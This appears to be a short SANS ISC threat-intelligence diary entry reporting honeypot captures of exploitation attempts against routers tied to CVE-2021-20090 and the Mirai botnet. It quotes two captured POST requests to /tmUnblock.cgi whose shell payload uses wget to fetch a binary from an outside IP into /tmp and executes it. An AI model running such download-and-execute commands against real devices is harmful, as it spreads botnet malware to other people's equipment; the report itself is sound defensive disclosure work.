Searching for Exposed ASUS Routers Vulnerable to CVE-2021-20090
Last Updated: 2021-11-26 13:59:21 UTC
by Guy Bruneau (Version: 1)
Over the past 7 days, my honeypot captured a few hundred POST for a vulnerability which appeared to be tracked as a critical path traversal vulnerability in the web interfaces of routers with Arcadyan firmware. If successfully exploited, could allow unauthenticated remote actors to bypass authentication and add the router to the botnet Mirai botnet.
20211125-135312: 192.168.25.9:80-220.127.116.11:44670 data
POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http[:]//18.104.22.168/bins/mpsl;chmod 777 *;./mpsl selfrep.asus
20211126-090429: 192.168.25.9:80-22.214.171.124:39036 data
POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http[:]//126.96.36.199/bins/mpsl;chmod 777 *;./mpsl selfrep.asus
Indicators Top 10 IPs
Guy Bruneau IPSS Inc.
My Handler Page
gbruneau at isc dot sans dot edu